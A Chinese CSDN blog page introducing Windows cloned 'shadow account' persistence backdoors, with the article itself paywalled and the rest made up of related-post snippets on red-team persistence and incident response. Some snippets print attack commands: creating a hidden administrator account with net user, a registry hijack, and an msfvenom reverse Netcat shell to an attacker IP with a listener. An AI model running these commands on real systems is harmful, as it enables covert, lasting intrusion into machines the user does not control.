[权限维持] Windows 权限维持 —— 影子账户后门 - 克隆账户

已于 2025-03-30 17:06:45 修改
阅读量947 收藏 26
点赞数 32
CC 4.0 BY-SA版权
分类专栏: 网络安全 — 内网安全攻防 文章标签: windows 网络安全 安全 网络
于 2025-02-28 06:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73360524/article/details/145809589

🌟想系统化学习内网渗透?看看这个:[内网安全] 内网渗透 - 学习手册-CSDN博客

0x01:Windows 克隆账户后门原理解析

Windows 克隆账户是一种通过创建隐藏的系统用户账户,绕过常规管理工具检测的持久化攻击手段。攻击者通过修改注册表或 SAM 数据库(Security Account Manager),使账户在图形界面和部分命令行工具中不可见,但可通过特定方式登录系统,实现隐蔽控制。

此后门不建议且不能应用于域环境中!!!

笔者后面实操发现,当你拿下的 Shell 属于域环境用户时,你创建的用户会直接注册到 DC 中,人家一眼就看到了。而且由于域环境的用户验证是由 DC 进行,所以其本地注册表与个人机器也是有很大差别的,留不了,根本留不了。

0x02:Windows 克隆账户后门环境搭建

了解本专栏 订阅专栏 解锁全文 超级会员免费看
【应急响应】Windows应急响应手册(远控后门篇)
李火火的安全圈
07-19 1398
本篇文章以实战攻防过程中对于远程控制和恶意程序运行等利用手段做后续的应急排查工作,根据所能获取到的信息进一步跟踪动向进行排查处置。
[权限维持] Windows 权限维持 —— 影子账户后门 - 基础隐藏
Blue17 の 小窝
02-28 651
如上,远程登录成功,由于我们上面创建影子账号的 Shell 是 Hack3rX 里的 Administrator,所以我们创建的 hacker用户很自然也归属于域中,反之,如果创建该用户的是本地用户,那么​ 也应该以。做权限维持的前提是你已经拿到了靶机的一个权限(一般还是高权限,不然部分后门你还没有权限写入),所以我们得先用攻击机生成一个木马文件,上传靶机后运行,先拿到靶机的一个权限。如上,可以看到,基础款的影子账户的隐蔽性还是不行,太容易被发现了,下一章笔者将介绍高级隐藏款,可以防止绝大多数的排查。
28_权限维持
qq_45301512的博客
12-19 215
所以当我们成功对目标的靶机植入后门程序,比如shell.exe,在第一次使用cobalt strike产生回连的情况下,利用梼杌组件的权限维持的遥测计划任务,让目标靶机定时去运行我们的shell.exe,那么不管靶机是否关机或者其它情况,让我们连接断开,我们都可以等到目标靶机开机,并且在定时的那个时间点,等待程序被运行,等待回连即可。在新增的sethc.exe里面,新增一个Debugger字符串,设置的值为calc.exe的启动路径,意味着当我们运行sethc.exe的同时也运行了calc.exe。
排查windows下的隐藏账户克隆账户
最新发布
lsx134679的博客
04-11 825
本文讲解了一些排查windows隐藏账户克隆账户的方法。用了简洁的语言,希望阅读者能最快掌握方法。
windows常见后门隐藏和权限维持方法及排查技术
3569
04-24 7153
https://xz.aliyun.com/t/4842 这片文章中隐藏webshell我觉得很nice ... 进程注入以前试过 ... wmi 和 bitsadmin 可以了解下 ... 常见backdoor和persistence方式方法 系统工具替换后门 Image 劫持辅助工具管理器 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\...
Windows以及Linux的入侵排查
qq_60600840的博客
06-03 924
对于系统或者应用发生了安全事件之后的处理应急响应的处理分为事前和事后处理数据备份、风险评估、安全培训、应急演练等病毒检测、后门检测、系统恢复、清除病毒以及后门程序、调查与追踪、入侵者取证等。后门查杀
蓝队必备技能——windows后门病毒应急响应
2301_80127209的博客
04-18 916
大家好 我是spider。今天出一期应急响应。hw在即你还是初级?学习一下子吧 兄弟,我给大家整实际案例上去本期木有太多废话 都是干活 直接上思路和步骤。
[权限维持] Windows 权限维持 —— 计划任务后门
Blue17 の 小窝
02-24 1224
为了防止靶机重启,或者对方的安全人员 Kill 掉我们刚刚与靶机建立的连接,我们就可以通过建立 Windows 计划任务的方式,让对方的靶机定期执行 update.exe 文件,定时上线。如上,可以说明,当恶意的计划任务正在运行时,又满足了计划任务执行条件,Windows 默认是不会再次执行此任务的,所以此任务就会显示在 “正在运行的任务” 中。攻击者可以在拿下目标后,通过创建计划任务的方式,在目标靶机上留下后门程序,让系统定时执行,这样,即使目标计算机关机重启,攻击者也能重新获得靶机权限
[权限维持] Windows 权限维持 —— Logon Scripts 后门
Blue17 の 小窝
02-27 613
这部分我们站在防守者视角,来排查下 Windows Logon Scripts 后门。为了防止靶机重启,或者对方的安全人员 Kill 掉我们刚刚与靶机建立的连接,我们就可以通过部署 Windows Logon Scripts 后门的方式,实现对目标的持久化控制。做权限维持的前提是你已经拿到了靶机的一个权限(一般还是高权限,不然部分后门你还没有权限写入),所以我们得先用攻击机生成一个木马文件,上传靶机后运行,先拿到靶机的一个权限。如上,可以看到我们的攻击者此时已经失去了靶机的控制权(毕竟关机了)。
[权限维持] Windows 权限维持 —— 注册表自启后门
Blue17 の 小窝
02-26 1429
Windows 注册表后门是一种通过修改注册表实现隐蔽持久化访问的恶意手段,通常被攻击者用于维持对受感染系统的控制。其核心原理是通过篡改注册表值,在系统启动、程序运行或特定事件触发时执行恶意代码。本章我们主要是介绍注册表后门中的 “启动项注入” 后门。攻击者通过注册表设置系统或用户登录时的启动项,这样当系统重新启动或者特定用户登录时,就会自动触发后门程序,导致攻击者可以持续控制目标机器。
Windows权限维持1:账号隐藏
da_chuan_chuan的博客
12-30 3304
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
网络安全从入门到精通(特别篇I):应急响应之不同平台后门排查思路
HACKONE的博客
05-26 216
Linux-后门-常规&权限维持&Rootkit&内存马。Rootkit后门:GScan rkhunter。Windows-后门-常规&权限维持&内存马。权限维持后门:GScan rkhunter。2、Rootkit后门-分析检测。3、Web程序内存马-分析检测。4、Web程序内存马-分析检测。1、常规MSF后门-分析检测。1、常规MSF后门-分析检测。2、权限维持后门-分析检测。3、权限维持后门-分析检测。Web层面:通用系统层面。2、内存马(无文件马)
系统后门应急排查方法
无问社区的博客
03-13 550
首先需要确定后门运行时的行为,处置目标多数都是以获取目标样本,排查入侵来源,在排查中最高效直接的自然就是用杀软杀毒,如果当前杀软杀不出来,那就多换几个,当然,勒索病毒除外。直接对文件进行查杀验证,需要注意的是,有些后门文件会使用系统文件名,路径也极为相似,此时需要关注路径是否正确。1、通过tasklist查看进程dll,这里要有心理准备,会出现上百个dll让你排查。一般来讲,通过上述三种方式都能确定到后门进程/文件。在父进程的modules中可以排查到恶意dll文件。1、已经确定异常进程并找到了病毒文件。
Windows权限维持之建立影子账号(五)
2303_78851087的博客
03-03 507
Windows权限维持之建立影子账号(五)
操作系统权限维持(二)之Windows系统-克隆账号维持后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-25 1471
隐藏账户,顾名思义就是计算机上看不到的用户在一个用户名后面添加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持
应急响应篇:windows入侵排查
kali_Ma的博客
09-08 2081
前言 应急响应(Incident Response Service,IRS)是当企业系统遭受病毒传播、网络攻击、黑客入侵等安全事件导致信息业务中断、系统宕机、网络瘫痪,数据丢失、企业声誉受损,并对组织和业务运行产生直接或间接的负面影响时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,同时分析入侵原因、还原入侵过程、评估业务损失、溯源黑客取证并提出解决方案和防范措施,减少企业因黑客带来的相关损失。本文主要讨论windows被入侵后的排查思路。 windows入侵排查利器:火绒剑 202
应急响应学习
qq_41672971的博客
12-01 471
应急响应学习
windwos系统安全手工排查以及朔源应急响应技巧
it知识分享 free for nothing..
09-14 943
共享目录登录记录位于windows安全日志中,登录类型为3,常见的基于共享目录的攻击行为是IPC爆破,若爆破成功,攻击者可以将受攻击主机的磁盘文件映射到本地,造成信息泄露。注意:有时候登录记录会十分多,分析起来难度大,因此我们可以根据前期收集到的信息来帮助我们缩小审计范围,比如异常现象发生的时间,恶意文件创建的时间等,可在这类时间点附近查找异常的登录记录。隐藏模块往往也是动态库模块,但它肉眼观察不到(Windows系统工具看不到,PCHunter等工具也看不到),是很隐蔽的一种手段,属于难查难杀的类型。
Windows影子用户及其相应的漏洞后渗透
weixin_51339377的博客
04-14 2142
#当获得一条shell后,可以创建一个影子用户,通过影子用户可以行驶正常用户的所有权限与功能, 并且只可在注册表中被检测出来---(应急响应注册表很重要) 1.首先需要拥有权限创建一个Administrator用户,并分配管理员权限。 net user haha$ 123 /add #创建一个新用户haha 密码是123 net localgroup administrators haha$ /add #将该新用户移动到管理员组下 net localgroup users ...
kali linux权限维持,权限维持-NC后门
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统上维持其访问权限。其中一个方法是使用NC后门。 NC后门是一种基于Netcat的后门,它允许攻击者在被攻击系统上远程执行命令。以下是在Kali Linux中创建NC后门的步骤: 1. 在Kali Linux中打开终端,并输入以下命令来生成一个反向Shell: ``` msfvenom -p cmd/unix/reverse_netcat lhost=<攻击者IP> lport=<攻击者端口> -f raw > nc_backdoor ``` 2. 接下来,使用以下命令将生成的反向Shell作为后门上传到受攻击系统: ``` nc -nv <受攻击系统IP> <受攻击系统端口> < nc_backdoor ``` 3. 等待受攻击系统连接到攻击者的系统,然后使用以下命令打开一个监听器: ``` nc -nlvp <攻击者端口> ``` 4. 当受攻击系统连接到攻击者的系统时,攻击者将获得一个Shell,可以在其中执行任意命令。 请注意,NC后门只是权限维持的一种方法,攻击者可能会使用其他技术来维持其访问权限,因此在Kali Linux中学习权限维持是至关重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Blue17 :: Hack3rX

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值